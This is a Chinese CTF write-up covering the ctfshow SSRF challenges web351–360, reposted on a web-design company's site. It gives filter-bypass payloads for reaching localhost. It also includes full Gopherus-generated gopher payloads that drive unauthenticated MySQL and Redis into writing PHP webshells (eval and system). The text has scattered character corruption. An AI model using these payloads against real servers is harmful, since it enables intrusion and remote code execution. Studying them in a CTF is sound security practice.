php中SSRF的介紹以及用法�,很多新手對此不是很清楚,為了幫助大家解決這個(gè)難題�,下面小編將為大家詳細(xì)講解���,有這方面需求的人可以來學(xué)習(xí)下,希望你能有所收獲���。
成都創(chuàng)新互聯(lián)主要從事成都做網(wǎng)站�����、成都網(wǎng)站設(shè)計(jì)����、成都外貿(mào)網(wǎng)站建設(shè)�����、網(wǎng)頁設(shè)計(jì)、企業(yè)做網(wǎng)站��、公司建網(wǎng)站等業(yè)務(wù)�����。立足成都服務(wù)介休,10余年網(wǎng)站建設(shè)經(jīng)驗(yàn),價(jià)格優(yōu)惠�����、服務(wù)專業(yè),歡迎來電咨詢建站服務(wù):13518219792
SSRF(Server-Side Request Forgery:服務(wù)器端請求偽造) 是一種由攻擊者構(gòu)造形成由服務(wù)端發(fā)起請求的一個(gè)安全漏洞�����。一般情況下����,SSRF攻擊的目標(biāo)是從外網(wǎng)無法訪問的內(nèi)部系統(tǒng)。(正是因?yàn)樗怯煞?wù)端發(fā)起的�����,所以它能夠請求到與它相連而與外網(wǎng)隔離的內(nèi)部系統(tǒng))
web351
curl_init — 初始化 cURL 會(huì)話
curl_setopt — 設(shè)置一個(gè)cURL傳輸選項(xiàng)��。
| CURLOPT_HEADER | 啟用時(shí)會(huì)將頭文件的信息作為數(shù)據(jù)流輸出。 | | URLOPT_RETURNTRANSFER | 將curl_exec()獲取的信息以文件流的形式返回�����,而不是直接輸出����。 |
curl_exec — 執(zhí)行 cURL 會(huì)話
curl_close — 關(guān)閉 cURL 會(huì)話
如果我們直接訪問,會(huì)輸出
非本地用戶禁止訪問
所以需ssrf讀取flag, payload:
# POST
url=http://127.0.0.1/flag.php
web352~過濾127.0.0,localhost
hacker
parse_url — 解析 URL����,返回其組成部分
這里過濾了/localhost|127.0.0/,
假的吧���,都可以出來����,
url=http://localhost/flag.php
url=http://127.0.0.1/flag.php
在本地嘗試嘗試?yán)@過:
ping 127.0.1
ping 127.1
ping 0x7F.0.0.1
ping 0177.0.0.1
題目嘗試也可繞過�����。
web353
hacker
直接繞過:
url=http://127.1/flag.php
url=http://0x7F.0.0.1/flag.php
url=http://0177.0.0.1/flag.php
web354
hacker
直接把1和·0也給過濾了�����。
可以
將自己域名A記錄指向127.0.0.1
[http://sudo.cc/](http://sudo.cc/)正好指向127.0.0.1
302跳轉(zhuǎn)
web355
hacker
這里要求$x['host']長度不大于5.
直接,127.1正好是5
url=http://127.1/flag.php
還可找一個(gè)域名長度不大于5的域名 A 記錄解析到127.0.0.1.
web356
hacker
這回更絕,長度不大于 3 .
0在linux系統(tǒng)中會(huì)解析成127.0.0.1在windows中解析成0.0.0.0
payload:
url=http://0/flag.php
web357
'.$ip.'';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
die('ip!');
}
echo file_get_contents($_POST['url']);
}
else{
die('scheme');
}
?> scheme域名解析到vps,
ssrf.php
web358
正則表達(dá)式的意思是以http://ctf.開頭��,以show結(jié)尾�。
payload:
url=http://ctf.@127.0.0.1/flag.php?show
web359~打MySQL
打無密碼的mysql
https://www.freebuf.com/articles/web/260806.html
git clone https://github.com/tarunkant/Gopherus.git
python gopherus.py
[root@p1 Gopherus]# python gopherus.py --exploit mysql
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >\/ |__| \/ \/ \/
author: $_SpyD3r_$
For making it work username should not be password protected!!!
Give MySQL username: root
Give query to execute: select '' into outfile '/var/www/html/ma.php';
Your gopher link is ready to do SSRF :
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%47%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%6d%61%2e%70%68%70%27%3b%01%00%00%00%01
然后傳到check.php中post: returl=xxxxx,但是不要忘了把下劃線后面的內(nèi)容url編碼一次.
瀏覽器會(huì)對此url進(jìn)行一次解碼,解碼后的url可能會(huì)含特殊字符�,curl提交時(shí)需再次編碼.
returl=gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2547%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%253f%253e%2527%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%256d%2561%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501
之后就會(huì)生成ma.php.
web360~打redis
和上題差不多
[root@p1 Gopherus]# python gopherus.py --exploit redis
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >\/ |__| \/ \/ \/
author: $_SpyD3r_$
Ready To get SHELL
What do you want?? (ReverseShell/PHPShell): PHPshell
Give web root location of server (default is /var/www/html):
Give PHP Payload (We have default PHP Shell):
Your gopher link is Ready to get PHP Shell:
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2424%0D%0A%0A%0A%3C%3F%3Dsystem%28%27ls%20/%27%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter.
看完上述內(nèi)容是否對您有幫助呢?如果還想對相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章�����,請關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道��,感謝您對創(chuàng)新互聯(lián)的支持���。
本文名稱:php中SSRF的介紹以及用法
文章位置:http://weahome.cn/article/ijeccs.html
重慶分公司
重慶分公司
